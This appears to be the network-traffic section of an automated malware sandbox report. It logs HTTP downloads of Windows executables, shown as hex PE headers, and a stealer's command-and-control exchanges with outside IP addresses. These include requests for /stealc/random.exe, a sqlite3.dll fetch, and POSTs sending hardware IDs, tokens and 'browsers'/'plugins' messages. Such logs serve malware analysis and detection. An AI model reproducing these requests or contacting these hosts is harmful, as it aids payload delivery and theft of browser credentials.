Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 03:39:20 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 03:39:20 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 03:39:23 GMTContent-Type: application/octet-streamContent-Length: 1955840Last-Modified: Sat, 27 Jul 2024 03:09:26 GMTConnection: keep-aliveETag: "66a464e6-1dd800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 10 41 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 40 4d 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4d 00 00 04 00 00 b4 73 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 2d 4d 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 2d 4d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2b 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 79 62 66 63 66 66 76 00 c0 1a 00 00 70 32 00 00 c0 1a 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 6d 63 68 69 72 7a 7a 00 10 00 00 00 30 4d 00 00 04 00 00 00 b2 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4d 00 00 22 00 00 00 b6 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 03:39:25 GMTContent-Type: application/octet-streamContent-Length: 1879552Last-Modified: Sat, 27 Jul 2024 03:10:02 GMTConnection: keep-aliveETag: "66a4650a-1cae00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 90 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 4a 00 00 04 00 00 f2 5e 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 72 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 69 6e 79 6f 62 6a 6e 00 a0 19 00 00 e0 30 00 00 94 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 76 65 6f 71 70 71 75 00 10 00 00 00 80 4a 00 00 04 00 00 00 88 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 4a 00 00 22 00 00 00 8c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000016001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGCBGCAFIIECBFIDHIHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 39 37 46 39 41 35 35 33 43 36 32 35 30 37 32 38 36 39 35 38 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 2d 2d 0d 0a Data Ascii: ------ECBGCBGCAFIIECBFIDHIContent-Disposition: form-data; name="hwid"5897F9A553C62507286958------ECBGCBGCAFIIECBFIDHIContent-Disposition: form-data; name="build"sila------ECBGCBGCAFIIECBFIDHI--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFCHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 33 30 31 30 66 66 31 62 34 63 64 65 36 34 63 30 66 36 35 34 32 33 38 31 65 61 36 39 65 61 38 33 61 36 33 35 65 63 39 37 36 65 66 61 36 66 62 39 66 39 34 34 38 66 37 66 35 35 65 39 37 38 35 34 30 63 39 32 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 2d 2d 0d 0a Data Ascii: ------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="message"browsers------BGDAAKJJDAAKFHJKJKFC--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCBAEHCAEGDHJKFHJKFHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 33 30 31 30 66 66 31 62 34 63 64 65 36 34 63 30 66 36 35 34 32 33 38 31 65 61 36 39 65 61 38 33 61 36 33 35 65 63 39 37 36 65 66 61 36 66 62 39 66 39 34 34 38 66 37 66 35 35 65 39 37 38 35 34 30 63 39 32 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 2d 2d 0d 0a Data Ascii: ------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="message"plugins------KFCBAEHCAEGDHJKFHJKF--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDAEBGIDBGHIECBGHJDHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 41 45 42 47 49 44 42 47 48 49 45 43 42 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 33 30 31 30 66 66 31 62 34 63 64 65 36 34 63 30 66 36 35 34 32 33 38 31 65 61 36 39 65 61 38 33 61 36 33 35 65 63 39 37 36 65 66 61 36 66 62 39 66 39 34 34 38 66 37 66 35 35 65 39 37 38 35 34 30 63 39 32 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 41 45 42 47 49 44 42 47 48 49 45 43 42 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 41 45 42 47 49 44 42 47 48 49 45 43 42 47 48 4a 44 2d 2d 0d 0a Data Ascii: ------EGDAEBGIDBGHIECBGHJDContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------EGDAEBGIDBGHIECBGHJDContent-Disposition: form-data; name="message"fplugins------EGDAEBGIDBGHIECBGHJD--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAAKJDAAFBAAKEBAAKFHost: 85.28.47.31Content-Length: 6851Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000017001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEBKEHCAKFCBFIDAAKHost: 85.28.47.31Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFCFHJDBKKFHIEHIDGHost: 85.28.47.31Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
